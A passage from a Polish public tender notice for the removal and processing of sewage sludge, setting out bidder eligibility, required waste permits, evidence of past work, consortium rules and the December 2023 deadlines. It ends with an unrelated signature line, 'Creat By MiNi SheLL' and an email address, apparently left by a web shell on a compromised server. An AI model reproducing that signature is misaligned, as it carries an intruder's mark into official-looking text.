wykonywane w sposób należyty.<br/>d)	Zdolności do występowania w obrocie gospodarczym – Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>5.	Ocena spełnienia warunków określonych w pkt 1 dokonywana będzie zgodnie z formułą „spełnia - nie spełnia”, na podstawie złożonych wraz z ofertą dokumentów oraz oświadczeń, których wykaz zawiera Rozdział XII punkt 17 SWZ.<br/>6.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>7.	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający będzie żądał dostarczenia:<br/>•	informacji o przynależności lub braku przynależności do tej samej grupy kapitałowej - Załącznik nr 7 do SWZ,<br/>UWAGA: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>W przypadku Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedmiotowy dokument należy złożyć także w odniesieniu do tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe.<br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż pięć [ 5 ] dni, terminie aktualnych na dzień złożenia podmiotowych środków dowodowych, tj.: <br/>1)	W celu potwierdzenia, że Wykonawca posiada kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, związanej z realizacją przedmiotu zamówienia oferent załączy do oferty:<br/>a)	kopię wpisu do rejestru podmiotów wprowadzających produkty, produkty <br/>w opakowaniach i gospodarujących odpadami (BDO) odpowiednio w zakresie przetwarzania odpadów, zagospodarowania osadów ściekowych oraz transportu osadów ściekowych.<br/>b)	aktualne zezwolenia i dopuszczenia związane z realizacją zadania zgodnie z ustawą o odpadach tj.:<br/>•	zezwolenia na transport osadów, <br/>•	zezwolenia na prowadzenie działalności przetwarzania odpadów organicznych.<br/><br/>2)	W celu potwierdzenia, że Wykonawca posiada zdolności techniczne i zawodowe:<br/>wykazu - zgodnie z Załącznikiem nr 5 do SWZ - wykonanych lub aktualnie wykonywanych usług (min. 2 zamówienia) realizowanych w zakresie wywozu osadów ściekowych o kodach 19 08 01, 19 08 02 oraz 19 08 05 nie mniejszej niż 50.000 zł brutto każde, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania stron umowy, oraz załączenia dowodu potwierdzającego, że wykazane w wykazie usługi zostały wykonane lub są wykonywane należycie. Zamawiający informuje, że dowodami, o których mowa są: <br/>a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług poświadczenie winno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br/>b)	oświadczenie wykonawcy – jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej (lit. a),<br/>c)	przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 17.	Do Formularza oferty wykonawca składa również:<br/>a)	Załącznik nr 2 do SWZ - Oświadczenie Wykonawcy / Wykonawców / Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu, spełnieniu warunków udziału w postępowaniu i oświadczenie dotyczące podanych informacji,<br/>b)	Załącznik nr 3 do SWZ – Oświadczenie, z którego wynika, które usługi wykonują poszczególni Wykonawcy,<br/>c)	Załącznik nr 4 do SWZ – Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia,<br/>d)	Dokument, z którego wynika upoważnienie wykonawcy do podpisania oferty lub pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik:<br/>•	pełnomocnictwo – jeżeli Formularz oferty lub inny dokument jest podpisany przez osobę lub osoby uprawnione do reprezentowania na zewnątrz posiadającą/posiadające stosowne pełnomocnictwo,<br/>•	pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>W przypadku gdy pełnomocnictwo, zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/><br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje mocodawca.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 9.	Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (np. konsorcjum) obowiązują następujące postanowienia:<br/>a)	Wymagane jest ustanowienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu <br/>i zawarcia umowy w sprawie zamówienia publicznego.<br/>b)	Do oferty należy załączyć dokument ustanawiający pełnomocnika, o którym mowa <br/>w art. 58 ust. 2 ustawy pzp. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje również pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii dokumentów załączonych do oferty.<br/>c)	Kopie dokumentów dotyczących poszczególnych Wykonawców muszą być poświadczone własnoręcznym podpisem i dopiskiem „za zgodność z oryginałem”, przez wyznaczonego przez nich pełnomocnika lub odpowiednio przez tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 10 Projektu umowy - Załącznik nr 6 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-18 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-18 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2.	Wykluczeniu podlega również Wykonawca o którym mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tekst jedn. Dz.U. z 2023 poz. 1497).

Creat By MiNi SheLL
Email: jattceo@gmail.com